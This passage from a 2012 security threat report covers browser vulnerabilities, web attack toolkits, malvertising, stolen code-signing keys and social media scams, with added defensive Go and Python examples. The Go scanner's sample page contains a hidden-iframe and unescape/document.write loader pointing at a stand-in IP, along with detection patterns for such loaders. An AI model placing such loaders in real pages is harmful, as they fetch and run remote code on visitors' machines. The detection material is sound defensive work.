Small size and relative anonymity are not defenses against the<br />
most sophisticated attacks. Targeted attacks threaten small<br />
companies as well as large ones. Attackers could also use your<br />
website as a way to attack other people. If you assume you<br />
are a potential target and improve your defenses against the<br />
most serious threats, you will automatically improve your<br />
protection against other threats.<br />
Defense in Depth.<br />
Emphasize multiple, overlapping, and mutually supportive<br />
defensive systems to guard against single-point failures in<br />
any specific technology or protection method. This should<br />
include the deployment of regularly updated firewalls, as well<br />
as gateway antivirus, intrusion detection, intrusion protection<br />
systems, and Web <strong>security</strong> gateway solutions throughout the<br />
network. Endpoints must be secured by more than signature-based<br />
antivirus technology.<br />
Educate Employees.<br />
Raise employees’ awareness about the risks of social<br />
engineering and counter it with staff training. Similarly, good<br />
training and procedures can reduce the risk of accidental data<br />
loss and other insider risks. Train staff about the value of<br />
data and how to protect it.<br />
Data Loss Prevention.<br />
Prevent data loss and exfiltration with data loss prevention<br />
software on your network. Use encryption to protect data in<br />
transit, whether online or via removable storage.
p. 23<br />
Vulnerabilities, Exploits, and Toolkits
p. 24<br />
Introduction<br />
Recent research by the Ponemon Institute suggests that the<br />
cost of cybercrime rose by six percent in 2012 with a 42 percent<br />
increase in the number of cyberattacks. The cost is significant<br />
with businesses incurring an average cost of $591,780. 13 Given<br />
the increased availability of vulnerabilities and exploits, it comes<br />
as no surprise that cybercriminals have increased their<br />
ability to make a profit.<br />
Quite a few diverse skills are needed to find vulnerabilities,<br />
create ways to exploit them, and then run attacks using them.<br />
Fortunately for the cybercriminal, a black market exists where<br />
these skills can be purchased in the form of toolkits. Hackers<br />
find, exploit, and/or sell vulnerabilities. Toolkit authors find<br />
or buy exploit code and incorporate it into their “products.”<br />
Cybercriminals in turn buy or steal the latest versions of toolkits<br />
which allow them to run massive attacks without the trouble of<br />
learning the skills needed to run the whole operation.<br />
Data<br />
Browser Vulnerabilities 2010 – 2012<br />
Source: Symantec<br />
[Chart: share of browser vulnerabilities (0–50%) per year for 2010, 2011, and 2012, for Apple Safari, Google Chrome, Mozilla Firefox, Microsoft Internet Explorer, and Opera.]<br />
At a Glance<br />
• The number of zero-day vulnerabilities used in attacks is up, from 8 in 2011 to 14 in 2012.<br />
• There is an increasingly sophisticated black market serving a<br />
multi-billion dollar online crime industry.<br />
• These vulnerabilities are later commercialized and added<br />
to Web-attack toolkits, usually after they have been publicly<br />
disclosed.<br />
• In 2012, drive-by Web attacks increased by one third, possibly<br />
driven by malvertising.<br />
• Around 600,000 Macs were infected with Flashback malware<br />
this year.<br />
• The Sakura toolkit, which had little impact in 2011, now<br />
accounts for approximately 22 percent of Web-based toolkit<br />
attacks, overtaking Blackhole during some points of the year.<br />
Plug-in Vulnerabilities 2010 – 2012<br />
Source: Symantec<br />
[Chart: share of plug-in vulnerabilities (0–50%) per year for 2010, 2011, and 2012, for Adobe Flash Player, Oracle Sun Java, Adobe Acrobat Reader, and Apple QuickTime.]
p. 25<br />
Total Vulnerabilities<br />
Source: Symantec<br />
[Chart: vulnerabilities reported per month, January to December 2012, on a scale of 0 to 600.]<br />
Zero-day Vulnerabilities<br />
Source: Symantec<br />
[Chart: zero-day vulnerabilities reported per month, January to December 2012, on a scale of 0 to 3.]<br />
• There were 5,291<br />
vulnerabilities reported in<br />
2012, compared with 4,989<br />
in 2011.<br />
• Reported vulnerabilities per<br />
month in 2012 fluctuated<br />
roughly between 300 and<br />
500 per month.<br />
• In 2012, there were 85<br />
public SCADA (Supervisory<br />
Control and Data Acquisition)<br />
vulnerabilities, a massive<br />
decrease from the 129<br />
vulnerabilities in 2011.<br />
• There were 415 mobile<br />
vulnerabilities identified in<br />
2012, compared with 315 in<br />
2011.<br />
• A zero-day vulnerability is<br />
one that is reported to have<br />
been exploited in the wild<br />
before the vulnerability is<br />
public knowledge and prior<br />
to a patch being publicly<br />
available.<br />
• There were 14 zero-day<br />
vulnerabilities reported in<br />
2012.<br />
• There were up to 3 zero-day<br />
vulnerabilities reported each<br />
month.
p. 26<br />
Analysis<br />
Web-based Attacks on the Rise<br />
We have seen the number of Web-based attacks increase by<br />
almost a third. These attacks silently infect enterprise and<br />
consumer users when they visit a compromised website. In<br />
other words, you can be infected simply by visiting a legitimate<br />
website. Typically, attackers infiltrate the website to install their<br />
attack toolkits and malware payloads, unbeknown to the site<br />
owner or the potential victims.<br />
The malware payload that is dropped by Web-attack toolkits<br />
is often server-side polymorphic or dynamically generated,<br />
rendering enterprises that rely on signature-based antivirus<br />
protection unable to protect themselves against these silent<br />
attacks. A hidden piece of JavaScript or a few lines of code<br />
linking to another website can install malware that is very<br />
difficult to detect. It then checks the system of each visitor for<br />
browser or operating system vulnerabilities until it finds one<br />
that is likely to succeed and it uses that to install malware on<br />
the visitor’s computer.<br />
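The paragraph above and the web injection figure on page 21 describe the same artifact from the defender's side: a hidden script or frame in an otherwise legitimate page that sends the visitor to an exploit host. The Go program below is an added example, not code from the report or from Symantec, of a first-pass scan a site owner can run over their own pages to surface exactly those elements: scripts loaded from hosts that are neither the site nor an expected third party, inline scripts that decode and write content into the page, and frames that are sized to be invisible. The page, the hosts (example.org, cdn.example-analytics.net, video.example.net, 203.0.113.7) and the heuristics are constructed for the example.<br />

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

type Finding struct {
	Kind   string // external-script, obfuscated-inline-script, hidden-iframe, external-iframe
	Detail string
}

var (
	scriptRe = regexp.MustCompile(`(?is)<script\b([^>]*)>(.*?)</script\s*>`)
	iframeRe = regexp.MustCompile(`(?is)<iframe\b([^>]*)>`)
	attrRe   = regexp.MustCompile(`(?i)([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))`)
	// decode-then-write constructs typical of injected loaders (a heuristic: legitimate pages use them too)
	obfusRe = regexp.MustCompile(`(?i)unescape\s*\(|fromCharCode|document\.write\s*\(|eval\s*\(`)
)

// attrs extracts the attributes (lower-cased names) from the text inside a tag.
func attrs(tag string) map[string]string {
	m := map[string]string{}
	for _, a := range attrRe.FindAllStringSubmatch(tag, -1) {
		m[strings.ToLower(a[1])] = a[2] + a[3] + a[4] // only one capture group is non-empty
	}
	return m
}

// external returns the host of src and whether it is neither the site itself nor allow-listed.
func external(src, site string, allow map[string]bool) (string, bool) {
	u, err := url.Parse(strings.TrimSpace(src))
	if err != nil || u.Host == "" {
		return "", false // relative reference: same origin as the page
	}
	h := strings.ToLower(u.Hostname())
	return h, !(h == site || strings.HasSuffix(h, "."+site) || allow[h])
}

// hidden is true for frames sized 0 or 1 px or styled invisible, the usual shape of an injected loader.
func hidden(a map[string]string) bool {
	style := strings.ToLower(strings.ReplaceAll(a["style"], " ", ""))
	if strings.Contains(style, "display:none") || strings.Contains(style, "visibility:hidden") {
		return true
	}
	tiny := func(v string) bool {
		v = strings.TrimSuffix(strings.TrimSpace(strings.ToLower(v)), "px")
		return v == "0" || v == "1"
	}
	return tiny(a["width"]) || tiny(a["height"])
}

// ScanHTML runs the heuristics over one page; site is the page's own host and allowed lists the
// third-party hosts the owner expects (CDNs, analytics). This is triage by regexp, not a full HTML parser.
func ScanHTML(doc, site string, allowed []string) []Finding {
	allow := map[string]bool{}
	for _, h := range allowed {
		allow[strings.ToLower(h)] = true
	}
	site = strings.ToLower(site)
	var out []Finding
	for _, m := range scriptRe.FindAllStringSubmatch(doc, -1) {
		a := attrs(m[1])
		if src, ok := a["src"]; ok {
			if h, ext := external(src, site, allow); ext {
				out = append(out, Finding{"external-script", h})
			}
		} else if obfusRe.MatchString(m[2]) {
			out = append(out, Finding{"obfuscated-inline-script", strings.TrimSpace(m[2])})
		}
	}
	for _, m := range iframeRe.FindAllStringSubmatch(doc, -1) {
		a := attrs(m[1])
		if h, ext := external(a["src"], site, allow); hidden(a) {
			out = append(out, Finding{"hidden-iframe", a["src"]})
		} else if ext {
			out = append(out, Finding{"external-iframe", h})
		}
	}
	return out
}

// samplePage is constructed for the example: the site's own script and the allow-listed CDN are
// benign; the remaining elements mimic the injected loaders the report describes.
const samplePage = `<html><head><script src="/js/app.js"></script>
<script src="https://cdn.example-analytics.net/t.js"></script>
<script src="//203.0.113.7/k.js"></script>
<script>document.write(unescape('%3Cscript src="http://203.0.113.7/x.js"%3E%3C/script%3E'));</script>
<iframe src="http://203.0.113.7/l.html" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="https://video.example.net/embed/1"></iframe>
</body></html>`

func main() {
	for _, f := range ScanHTML(samplePage, "example.org", []string{"cdn.example-analytics.net"}) {
		fmt.Printf("%-26s %s\n", f.Kind, f.Detail)
	}
}
```

Run with `go run` against a saved copy of a page; the four findings for the constructed page are the scheme-relative script from 203.0.113.7, the unescape/document.write loader, the 1x1 hidden frame, and the frame from video.example.net. The allow-list is what keeps this usable in practice: every third-party host a site legitimately loads from must be listed, so the scan also doubles as an inventory of the external code a page depends on.<br />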
These attacks are successful because enterprise and consumer<br />
systems are not up to date with the latest patches for browser<br />
plug-ins, such as Adobe’s Flash Player® and Acrobat Reader®,<br />
as well as Oracle’s Java platform. While a lack of attentiveness<br />
can be blamed for consumers remaining out of date, often in<br />
larger companies, older versions of these plug-ins are required<br />
to run critical business systems, making it harder to upgrade<br />
to the latest versions. Such patch management predicaments,<br />
with slow patch deployment rates, make companies especially<br />
vulnerable to Web-based attacks.<br />
It’s important to note that the volume of vulnerabilities doesn’t<br />
correlate to increased levels of risk. One single vulnerability in<br />
an application may present a critical risk to an organization,<br />
if exploited successfully. Analysis of risk from vulnerabilities<br />
exploited in Web-based attack toolkits is an area that Symantec<br />
will explore further in <strong>2013</strong>.<br />
The key is that it’s not the latest zero-day vulnerability that is<br />
responsible for the widespread success of Web-based attacks.<br />
The rate of attacks from compromised websites has increased<br />
by 30 percent, while the rate of discovery of vulnerabilities has<br />
only increased by 6 percent. In a nutshell, it’s older, non-patched<br />
vulnerabilities that cause most systems to get compromised.<br />
The Arms Race to Exploit New Vulnerabilities<br />
We have witnessed an increase in zero-day vulnerabilities this<br />
year. There were 14 unreported vulnerabilities first seen being<br />
used in the wild in 2012. This is up from 8 in 2011. Overall,<br />
reported vulnerabilities are up slightly in 2012, from 4,989 in<br />
2011 to 5,291 in 2012. Mobile vulnerabilities are also up, from<br />
315 in 2011 to 415 reported in 2012.<br />
Organized groups, such as the team behind the Elderwood<br />
attacks, have worked to discover new weaknesses in everyday<br />
software such as Web browsers and browser plug-ins. When one<br />
vulnerability becomes public, they are able to quickly deploy<br />
a new one, which speaks to the sophistication of the groups<br />
discovering and exploiting these vulnerabilities.<br />
There is an arms race between Internet criminals and legitimate<br />
software developers. Criminals’ ability to quickly find and<br />
exploit new vulnerabilities is not matched by software vendors’<br />
ability to fix and release patches. Some software companies<br />
only patch once a quarter; others are slow to acknowledge<br />
vulnerabilities. Even if they do a good job with updates,<br />
companies are often slow to deploy them.<br />
While zero-day vulnerabilities present a serious <strong>security</strong> threat,<br />
known (and even patched) vulnerabilities are dangerous if ignored.<br />
Many companies and consumers fail to apply published updates<br />
in a timely way. Toolkits that target well-known vulnerabilities<br />
make it easy for criminals to target millions of PCs and find the<br />
ones that remain open to infection. In fact, the vulnerabilities that<br />
are exploited the most often are not the newest.
p. 27<br />
Malvertising and Website Hacking<br />
How does a hacker add his code to a legitimate website? Toolkits<br />
are available that make it easy. For example, in May 2012, the<br />
LizaMoon toolkit used a SQL injection technique to affect at<br />
least a million websites. 14 Other approaches include:<br />
• Exploiting a known vulnerability in the website hosting or<br />
content management software<br />
• Using phishing, spyware, or social engineering to get the<br />
webmaster’s password<br />
• Hacking through the Web server backend infrastructure,<br />
such as control panels or databases<br />
• Paying to host an advertisement that contains the infection<br />
This last technique, known as malvertising, means that legitimate<br />
websites can be impacted without even being compromised. This<br />
form of attack appears to be very common. Using experimental<br />
scanning software (see “Website Malware Scanning and Website<br />
Vulnerability Assessment” later in this section), Symantec found<br />
that half of the tested sites were infected by malvertising.<br />
Malvertising opens an avenue of attack that hackers can use<br />
to compromise a website without having to directly hack<br />
the website itself. Using these malicious ads allows them to<br />
silently infect users, often installing dynamically created<br />
malware that antivirus alone is unable to detect.<br />
A sign of the seriousness of the problem is that Google<br />
and other search engines scan for malware and blacklist<br />
sites that contain malware. There have been occasions<br />
when prominent advertising networks have fallen prey to<br />
malvertising, impacting some of the biggest names in online<br />
media. 15 Situations like this can have a serious impact on<br />
websites whose bottom line often depends on revenue, even<br />
diminishing their credibility in the eyes of their readers.<br />
With dozens of advertising networks and constantly rotating<br />
adverts, tracking malvertising and preventing it is a huge<br />
challenge.<br />
Online advertisement for a malware toolkit.
p. 28<br />
Web Attack Toolkits<br />
It’s one thing to discover new vulnerabilities, but another<br />
matter to implement a way to exploit them. Criminal<br />
entrepreneurs turn them into toolkits that less sophisticated<br />
users can buy and use. Like commercial software, they even<br />
include support and warranties. Authors accept payments<br />
using online payment services with anonymous numbered<br />
accounts.<br />
Attack toolkits exist for creating a variety of malware and<br />
for attacking websites. The popular Blackhole toolkit is a<br />
notorious example. Its regular updates suggest that it has<br />
a kind of brand loyalty and that the authors are building on<br />
that in the same way that legitimate software vendors do with<br />
their updates and new editions.<br />
Blackhole continued to make its presence felt in 2012,<br />
making up for 41 percent of all Web-based attacks. We also<br />
saw the release of an updated version of the toolkit, dubbed<br />
Blackhole 2.0, back in September. However, Blackhole’s overall<br />
dominance may have begun to decline, as another Web attack<br />
toolkit surpassed Blackhole during a few months in the latter<br />
half of 2012. Sakura, a new entrant to the market, at its peak<br />
made up as much as 60 percent of all toolkit activity, and 22<br />
percent of overall toolkit usage in 2012.<br />
Web Attack Toolkits Over Time<br />
Source: Symantec<br />
[Chart: monthly share of Web-based toolkit attacks, January to December 2012, on a scale of 0 to 90%, for Blackhole, Sakura, Nuclear, Redkit, Phoenix, and Others.]<br />
Top Web Attack Toolkits by Percent<br />
Source: Symantec<br />
Toolkit Share of attacks<br />
Blackhole 41%<br />
Sakura 22%<br />
Phoenix 10%<br />
Redkit 7%<br />
Others 20%<br />
Approximately 41 percent of Web-based toolkit attacks<br />
in 2012 related to the Blackhole toolkit, compared with<br />
44 percent in 2011. The Sakura toolkit was not in the<br />
top 10 for 2011, and now accounts for approximately<br />
22 percent of Web-based toolkit attacks, overtaking<br />
Blackhole at some points in the year.
p. 29<br />
Website Malware Scanning and Website<br />
Vulnerability Assessment<br />
In 2012, Symantec’s Trust Services (formerly VeriSign)<br />
technology scanned over 1.5 million websites as part of its<br />
Website Malware Scanning and Vulnerability Assessment<br />
services. Over 130,000 URLs were scanned for malware each<br />
day, with 1 in 532 websites found to be infected with<br />
malware. The most common form of compromise was<br />
drive-by downloads.<br />
Furthermore, in assessing potentially exploitable vulnerabilities<br />
on websites, over 1,400 vulnerability scans were performed each<br />
day. Approximately 53 percent of websites scanned were found<br />
to have unpatched, potentially exploitable vulnerabilities (36<br />
percent in 2011), of which 24 percent were deemed to be critical<br />
(25 percent in 2011). The most common vulnerability found was<br />
cross-site scripting.<br />
The Growth of Secured Connections<br />
One of the ways to judge the growth of usage for SSL is to<br />
monitor the change in statistics for OCSP (Online Certificate<br />
Status Protocol, which is used for obtaining the revocation<br />
status of a digital certificate) and CRL (Certificate Revocation<br />
List) lookups. When an SSL secured connection is initiated, a<br />
revocation check is performed using OCSP or CRL and we track<br />
the number of lookups that go through our systems. This is a<br />
growth indicator for the number of SSL secured sessions that<br />
are performed online. This implies that more people are going<br />
online and using secured connections (for example, representing<br />
a growth of eCommerce transactions on the Web). It also may<br />
show the impact of the adoption of SSL more widely, in more<br />
places and for more uses, such as the growing use of Extended<br />
Validation SSL Certificates, which trigger browsers to indicate<br />
whether a user is on a secured site by turning the address bar<br />
green, and for “Always On SSL” (adopted heavily through 2012<br />
by social networks, search services, and online email providers).<br />
Further, it may be a result of devices other than traditional<br />
desktops and laptops that enable online access; for example,<br />
smartphones and tablets.<br />
In 2012, Symantec found that the average number of OCSP<br />
lookups grew by 31 percent year on year between 2011 and<br />
2012, with more than 4.8 billion lookups performed each day in<br />
2012. The high-water mark of OCSP lookups was 5.8 billion in<br />
a single day in 2012. It is worth noting that OCSP is the modern<br />
revocation checking methodology.<br />
Additionally, Symantec’s CRL lookups increased by 45 percent<br />
year on year between 2011 and 2012, with approximately<br />
1.4 billion per day, and a high-water mark of 2.1 billion.<br />
CRL is the older lookup technology that OCSP supersedes.<br />
Norton Secured Seal and Trust Marks<br />
In 2012, more consumers were visiting websites with trust<br />
marks (such as the Norton Secured Seal). Based on<br />
analysis of the statistics from Symantec’s own trust marks, we<br />
saw an 8 percent increase in 2012. The Symantec trust mark<br />
was viewed up to 750 million times a day in 2012 as more online<br />
users demand stronger <strong>security</strong> to safeguard their<br />
online activities.<br />
Stolen Key-signing Certificates<br />
2012 continued to show that organizations large and small were<br />
susceptible to becoming unwitting players in the global malware<br />
distribution network. We’ve seen increased activity of malware<br />
being signed with legitimate code-signing certificates. Since the<br />
malware code is signed, it appears to be legitimate, which makes<br />
it easier to spread.<br />
Malware developers often use stolen code-signing private<br />
keys. They attack Certificate Authorities and once inside<br />
their networks, they seek out and steal private keys. In other<br />
cases, poor <strong>security</strong> practices allow them to buy legitimate<br />
certificates with fake identities. For example, in May 2012,<br />
Comodo, a large Certificate Authority, authenticated and<br />
issued a legitimate code-signing certificate to a fictitious<br />
organization run by cybercriminals. 16
p. 30<br />
Recommendations<br />
Use a Full Range of Protection Technology.<br />
If the threat landscape were less advanced, then file scanning<br />
technology (commonly called antivirus) would be sufficient<br />
to prevent malware infections. However, with toolkits for<br />
building malware-on-demand, polymorphic malware, and<br />
zero-day exploits, antivirus is not enough. Network-based<br />
protection and reputation technology must be deployed on<br />
endpoints to help prevent attacks. And behavior blocking and<br />
scheduled file scanning must be used to help find malware<br />
that avoids preventative defenses.<br />
Protect Your Public-facing Websites.<br />
Consider Always On SSL to encrypt visitors’ interactions<br />
with your site across the whole site, not just on the checkout<br />
or sign-up pages. Make sure you update your content<br />
management system and Web server software just as you<br />
would a client PC. Run vulnerability and malware scanning<br />
tools on your websites to detect problems promptly. Use<br />
strong passwords for admin accounts and other services, and<br />
protect those credentials against social engineering and phishing.<br />
Limit login access to important Web servers to users that need it.<br />
Adopting an Always On SSL approach helps to safeguard<br />
account information from unencrypted connections and thus<br />
renders end users less vulnerable to a man-in-the-middle attack.<br />
Protect Code-signing Certificates.<br />
Certificate owners should apply rigorous protection and<br />
<strong>security</strong> policies to safeguard keys. This means effective<br />
physical <strong>security</strong>, the use of cryptographic hardware <strong>security</strong><br />
modules, and effective network and endpoint <strong>security</strong>,<br />
including data loss prevention on servers involved in signing<br />
code, and thorough <strong>security</strong> for applications used to sign code.<br />
In addition, Certificate Authorities need to ensure that they<br />
are using best practices in every step of the authentication<br />
process.<br />
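The revocation lookups counted under “The Growth of Secured Connections”, the stolen-key problem described under “Stolen Key-signing Certificates”, and the recommendation above meet in one place: what a consumer of signed code has to check before trusting it. The Go program below is an added example, not Symantec’s code or any vendor’s implementation. Using only the standard library, it builds a throwaway CA and a code-signing certificate in memory, signs a constructed artifact, and shows verification succeeding, then failing once the CA publishes a CRL for the key, which is what a CA does after the key is reported stolen. Every name, serial number and key is constructed for the example.<br />

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// Publisher is a constructed, test-only CA plus one code-signing leaf it issued; every
// key and certificate is generated in memory when the example runs. None of it is real.
type Publisher struct {
	CA, Leaf       *x509.Certificate
	CAKey, LeafKey *ecdsa.PrivateKey
}

func must[T any](v T, err error) T {
	if err != nil {
		panic(err) // acceptable here: all inputs are the example's own generated material
	}
	return v
}

// issue signs tmpl with signer (self-signed when parent is nil) and parses the result.
func issue(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, signer *ecdsa.PrivateKey) *x509.Certificate {
	if parent == nil {
		parent = tmpl
	}
	der := must(x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer))
	return must(x509.ParseCertificate(der))
}

// NewPublisher builds the CA and a leaf whose only extended key usage is code signing.
func NewPublisher() *Publisher {
	now := time.Now()
	caKey := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	leafKey := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	ca := issue(&x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "Example Test CA (constructed)"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		IsCA: true, BasicConstraintsValid: true,
		KeyUsage: x509.KeyUsageCertSign | x509.KeyUsageCRLSign, // crlSign is needed to issue the CRL below
	}, nil, &caKey.PublicKey, caKey)
	leaf := issue(&x509.Certificate{
		SerialNumber: big.NewInt(4242), Subject: pkix.Name{CommonName: "Example Software Publisher (constructed)"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		KeyUsage: x509.KeyUsageDigitalSignature, ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageCodeSigning},
	}, ca, &leafKey.PublicKey, caKey)
	return &Publisher{CA: ca, CAKey: caKey, Leaf: leaf, LeafKey: leafKey}
}

// Sign is the publisher's ECDSA signature over SHA-256(code).
func (p *Publisher) Sign(code []byte) []byte {
	h := sha256.Sum256(code)
	return must(ecdsa.SignASN1(rand.Reader, p.LeafKey, h[:]))
}

// Revoke is what the CA does once the leaf key is reported stolen: publish a CRL naming its serial.
func (p *Publisher) Revoke(at time.Time) *x509.RevocationList {
	der := must(x509.CreateRevocationList(rand.Reader, &x509.RevocationList{
		Number: big.NewInt(1), ThisUpdate: at, NextUpdate: at.Add(24 * time.Hour),
		RevokedCertificates: []pkix.RevokedCertificate{{SerialNumber: p.Leaf.SerialNumber, RevocationTime: at}},
	}, p.CA, p.CAKey))
	return must(x509.ParseRevocationList(der))
}

// VerifyCode is the consumer-side check: chain to a trusted root with the code-signing EKU,
// no matching entry on a CRL the CA actually signed, and a valid signature over the bytes.
func VerifyCode(code, sig []byte, leaf, root *x509.Certificate, crl *x509.RevocationList) error {
	roots := x509.NewCertPool()
	roots.AddCert(root)
	opts := x509.VerifyOptions{Roots: roots, KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageCodeSigning}}
	if _, err := leaf.Verify(opts); err != nil {
		return err
	}
	if crl != nil {
		if err := crl.CheckSignatureFrom(root); err != nil {
			return err // an unsigned or forged CRL proves nothing either way
		}
		for _, rc := range crl.RevokedCertificates {
			if rc.SerialNumber.Cmp(leaf.SerialNumber) == 0 {
				return errors.New("signing certificate is revoked")
			}
		}
	}
	pub, ok := leaf.PublicKey.(*ecdsa.PublicKey)
	h := sha256.Sum256(code)
	if !ok || !ecdsa.VerifyASN1(pub, h[:], sig) {
		return errors.New("signature does not verify for this artifact")
	}
	return nil
}

func main() {
	p := NewPublisher()
	code := []byte("constructed sample installer bytes")
	sig := p.Sign(code)
	fmt.Println("before revocation:", VerifyCode(code, sig, p.Leaf, p.CA, nil))
	fmt.Println("after revocation: ", VerifyCode(code, sig, p.Leaf, p.CA, p.Revoke(time.Now())))
}
```

Real consumers obtain the CRL, or an OCSP response, from the distribution points named inside the certificate rather than from the issuer object in memory; the decision itself is the same comparison of the leaf's serial number against a list the CA signed. The signature over the artifact stays mathematically valid after revocation, which is exactly why a verifier that skips the revocation step keeps trusting malware signed with a stolen key.<br />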
Be Aggressive on Your Software Updating and Review Your Patching Processes.<br />
The majority of Web-based attacks exploit the top 20 most<br />
common vulnerabilities. Consequently, installing patches for<br />
known vulnerabilities will prevent the most common attacks.<br />
It’s essential to update and patch all your software promptly.<br />
In particular, with risks like the Flashback attacks that used<br />
Java, it’s important to run the latest version of that software<br />
or do without it altogether. This is equally true for CIOs<br />
managing thousands of users, small business owners with<br />
dozens of users, or individual users at home.<br />
Update, patch, and migrate from outdated and insecure<br />
browsers, applications, and browser plug-ins to the latest<br />
available versions using the vendors’ automatic update<br />
mechanisms, especially for the top software vulnerabilities<br />
being exploited. Most software vendors work diligently<br />
to patch exploited software vulnerabilities; however, such<br />
patches can only be effective if adopted in the field. Be wary of<br />
deploying standard corporate images containing older versions<br />
of browsers, applications, and browser plug-ins that are<br />
outdated and insecure. Consider removing vulnerable plug-ins<br />
from images for employees that have no need for that software.<br />
Wherever possible, automate patch deployments to maintain<br />
protection against vulnerabilities across the organization.
p. 31<br />
Social Networking, Mobile, and the Cloud
p. 32<br />
Introduction

Online criminals and spammers are less interested in email as an infection vector than they were. Why? Because social media is becoming so popular and it gives them many new ways to steal people’s identities or personal information and infect their computers with malware.

Social media combines two behaviors that are useful for criminals: social proof and sharing. Social proofing is the psychological mechanism that convinces people to do things because their friends are doing it. For example, if you get a message on your Facebook wall from a trusted friend, you’re more likely to click on it.

Sharing is what people do with social networks: they share personal information such as their birthday, home address, and other contact details. This type of information is very useful for identity thieves. For example, your social media profile might contain clues to security questions a hacker would need to reset your password and take control of your account.

People are spending more time online, and the most popular activity is social networking. Furthermore, younger users are more commonly using mobile devices to access the Internet and social media applications. 17
Data

Top 5 Social Media Attacks in 2012
Source: Symantec
Rank Attack Type Share of Attacks
1 Fake Offering 56%
2 Manual Sharing 18%
3 Likejacking 10%
4 Fake Plug-in 5%
5 Copy and Paste 3%
Moreover, many mobile applications frequently rely on cloud-based storage, and without an Internet connection are often limited in their functionality. Many more people and businesses are routinely using cloud-based systems, sometimes without even realising it.

The bank robber Willie Sutton famously explained why he robbed banks: “Because that’s where the money is.” Online criminals target social media because that’s where the victims are.

Facebook users can report potential Facebook phishing scams to the company through the following email address: phish@fb.com.
At a Glance
• Scammers continue to use social media as spam and phishing tools, including newer sites such as Pinterest and Instagram.
• Mobile malware has increased significantly in 2012 with new threats such as mobile botnets.
• Thirty-two percent of all mobile malware steals information from the compromised device.
• Fast-growing trends towards cloud computing, bring your own device, and consumerization create additional risks for businesses.
• Fake Offering. These scams invite social network users to join a fake event or group with incentives such as free gift cards. Joining often requires the user to share credentials with the attacker or send a text to a premium rate number.
• Manual Sharing Scams. These rely on victims to actually do the hard work of sharing the scam by presenting them with intriguing videos, fake offers or messages that they share with their friends.
• Likejacking. Using fake “Like” buttons, attackers trick users into clicking website buttons that install malware and may post updates on a user’s newsfeed, spreading the attack.
• Fake Plug-in Scams. Users are tricked into downloading fake browser extensions on their machines. Rogue browser extensions can pose as legitimate extensions but when installed can steal sensitive information from the infected machine.
• Copy and Paste Scams. Users are invited to paste malicious JavaScript code directly into their browser’s address bar in the hope of receiving a gift coupon in return.
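Likejacking, listed above, is a form of clickjacking: the real “Like” button of the target site is loaded in an invisible frame so that a click intended for the attacker’s page lands on it. The defence on the site being framed is to refuse framing by third-party pages, which is controlled by the X-Frame-Options and Content-Security-Policy frame-ancestors response headers. The following is an added example, not code from the Symantec report or from any social network: a checker that classifies a response’s framing policy from its headers, including the cases a simple string match gets wrong (case-insensitive header names, frame-ancestors taking precedence over X-Frame-Options, and an empty source list meaning “no one”). The sample header sets are constructed.

```python
"""Classify an HTTP response's protection against being framed (clickjacking
and its likejacking variant). Added example, not part of the Symantec report;
the sample responses are constructed.
"""
from typing import Dict, List, Optional


def _csp_frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list from a CSP header value, with
    quotes stripped and lower-cased, or None if the directive is absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None


def framing_protection(headers: Dict[str, str]) -> str:
    """Classify a response's framing policy as one of:
      "denied"      - no page may frame it
      "same-origin" - only pages from the same origin may frame it
      "restricted"  - only the origins listed in frame-ancestors may frame it
      "allowed"     - any page may frame it (clickjacking-prone)

    Header names are matched case-insensitively. When CSP carries a
    frame-ancestors directive it decides the outcome and X-Frame-Options is
    ignored, which is how browsers that support the directive behave.
    """
    lower = {name.lower(): value for name, value in headers.items()}

    csp = lower.get("content-security-policy")
    if csp:
        ancestors = _csp_frame_ancestors(csp)
        if ancestors is not None:
            # An empty source list matches nothing, the same as 'none'.
            if ancestors in ([], ["none"]):
                return "denied"
            if ancestors == ["self"]:
                return "same-origin"
            if "*" in ancestors:
                return "allowed"
            return "restricted"

    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "denied"
    if xfo == "SAMEORIGIN":
        return "same-origin"
    # ALLOW-FROM was never supported by every browser, and an absent,
    # empty or malformed value gives no protection, so all are treated
    # conservatively as framable.
    return "allowed"


# Constructed sample responses exercising the decision branches.
SAMPLE_RESPONSES: Dict[str, Dict[str, str]] = {
    "no-headers": {"Content-Type": "text/html"},
    "xfo-deny": {"X-Frame-Options": "DENY"},
    "xfo-sameorigin-lowercase": {"x-frame-options": "sameorigin"},
    "csp-none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp-overrides-xfo": {"X-Frame-Options": "DENY",
                          "Content-Security-Policy": "frame-ancestors *"},
    "csp-partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
}


def audit(responses: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Run the classifier over a set of named responses."""
    return {name: framing_protection(hdrs) for name, hdrs in responses.items()}


if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_RESPONSES).items():
        print(f"{name:26s} {verdict}")
```

Anything the checker reports as "allowed" on a page that carries a state-changing button (Like, Share, Follow) is a page that can be used in exactly the way the likejacking bullet describes; the fix is to send frame-ancestors 'none' or 'self', keeping X-Frame-Options for older browsers.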
Mobile Vulnerabilities
Source: Symantec
[Chart: mobile vulnerabilities reported per month, January to December 2012; callout: 121 mobile vulnerabilities in March.]

Mobile Threats in 2012
Source: Symantec
